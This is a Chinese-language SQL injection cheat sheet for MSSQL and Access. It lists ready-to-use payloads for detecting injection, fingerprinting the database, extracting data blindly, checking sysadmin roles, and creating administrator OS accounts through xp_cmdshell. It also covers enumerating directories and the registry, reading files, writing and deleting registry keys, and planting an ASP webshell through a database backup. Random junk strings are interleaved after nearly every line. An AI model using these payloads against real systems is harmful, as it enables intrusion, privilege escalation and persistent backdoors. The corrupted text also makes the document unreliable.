1.判断是否有注入;and 1=1 ;and 1=2 Ir^ BC!<2>
2.初步判断是否是mssql ;and user>0 }Py<qXH
o3fR3P%$
3.注入参数是字符'and [查询条件] and ''=' gn364U a
@
E >eq.m
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ThbP;CzI#
(%.</|u
5.判断数据库系统 EtJD'&
GgT=t)}wu
;and (select count(*) from sysobjects)>0 mssql 48;~bVr}
6S)$3Is
;and (select count(*) from msysobjects)>0 access f7S^yA[[
?$2q P`-
C9G U6Ao
tjt=N\;
6.猜数据库 ;and (select Count(*) from [数据库名])>0 sBbL~ce50?
%6"o8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 2}59 7Hb
rpx0|{m
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =[ APMig,n
EmF]W+!z%
9.(1)猜字段的ascii值(access) FW/)uf3I
A<a2TXcIE3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 cj`#Tg.
,b.kw}k
(2)猜字段的ascii值(mssql) r,QJG$ Jo
zo/0b/lQ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ocq2
t;oT {Hge
10.测试权限结构(mssql) )Gx":
D
a
pKa4nI
g<0w/n!jmC
|3aS17yL>
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- J6= w:c
8xc8L1;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Hxj'38Y
O\3r%=TF
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ,.J<.#D3J
R%qX_m\0
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |:dCVd<du
\YjB+[.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- sb8z_3
FfZ{%E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- XryQ)x(
u=1B^V,6V
;and 1=(select IS_MEMBER('db_owner'));-- 5?D1][
Xqc'R5Cw
X
S6]C{
aB/{ %%o
11.添加mssql和系统的帐户 WNCM|VUl
3we.*\2$
;exec master.dbo.sp_addlogin username;-- jq7vOr-_g
;exec master.dbo.sp_password null,username,password;-- (N&k}CO]W
^)(G(=-Rf
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- u Eu6f
.ruqRGe/
;exec master.dbo.xp_cmdshell 'net user username password cC7"J\+r*
FZM
]o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- "cIGNTLFA
?3.(Vqwog
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ^A:!ni@3
*2w_oKE'+5
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- eUzU]6h
(YaOh^T:|
L3-<Kop
XfD
z
#
12.(1)遍历目录 p_D
on3
\=HfO?$ Ro
;create table dirs(paths varchar(100), id int) @1/Q
$71i+h]_
;insert dirs exec master.dbo.xp_dirtree 'c:\' a*pXrp@
0+$hkd n
;and (select top 1 paths from dirs)>0 5q0BG!A%T
_|Y.!ZRYP
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) j+z'
:Vu7,o
R^mu%dw)(%
p~v2XdR
(2)遍历目录 ,%"\\#3S
2@"0}po#
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- BH.:_Qrbh[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 I,?Fqg'sq
9n06n$F
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 P wt ?9I
[)C)p*!Y)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 c,b`N0dOKL
c,g]0S?gu
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0KWy?6 X
~v{C6)
?qq!%4mTB
I@y2HxM
13.mssql中的存储过程 ~;!i)[-
?15POY ?Z
xp_regenumvalues 注册表根键, 子键 "jkw8UVz
QZ:]8MHl]
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 < -@,
nr<}Hc^f-
xp_regread 根键,子键,键值名 A>&>6O4
te! ]9rR
;exec xp_regread 4iL.4Uj{N
7cOg(6N
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ^`hI00u(
Ba\wq:
xp_regwrite 根键,子键, 值名, 值类型, 值 %WJ\'@O\
pw(U< )
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 \'}/&PCkr
Y]`lEq%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 h&:Q$*A>
sqMNon`5
xp_regdeletevalue 根键,子键,值名 TnMVHO-
Kq@m?h
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 [Ls2k&)0
)Rm
'YmO
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 :yFTaniJ'.
g:uaI
ctwhfS|Y0
]HZa:aPY
14.mssql的backup创建webshell '<{oYXZW3
f:JYG]E &
use model 2F*Dkv
g-{<v4 NGI
create table cmd(str image); Aoy1<8WP%
.zSimEOF
insert into cmd(str) values (''); l1iF}>F2
%BKR}
backup database model to disk='c:\l.asp'; #h
#mOJ5
#1,>Qnl
EP*["fx
l9ch
15.mssql内置函数 %0y3 /W
Ztpm_P6
;and (select @@version)>0 获得Windows的版本号 c9cphZ(z
{C,1w
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ]C!Y~
8g2-8pa{
;and (select user_name())>0 爆当前系统的连接用户 *Wuctu^9
]y)R C-N
;and (select db_name())>0 得到当前连接的数据库 ]<o.aMdV
(x@i,Ba@
^V0{Ew/x
c5mhl;+'
16.简洁的webshell ;'WzfJ!q
-Uhl9
=
use model C^8)IN=$
U d=gdsL
create table cmd(str image); B1i!te}*
C.9eXa1wkT
insert into cmd(str) values (''); )T$fk
M#8Ao4
T
backup database model to disk='g:\wwwtest\l.asp';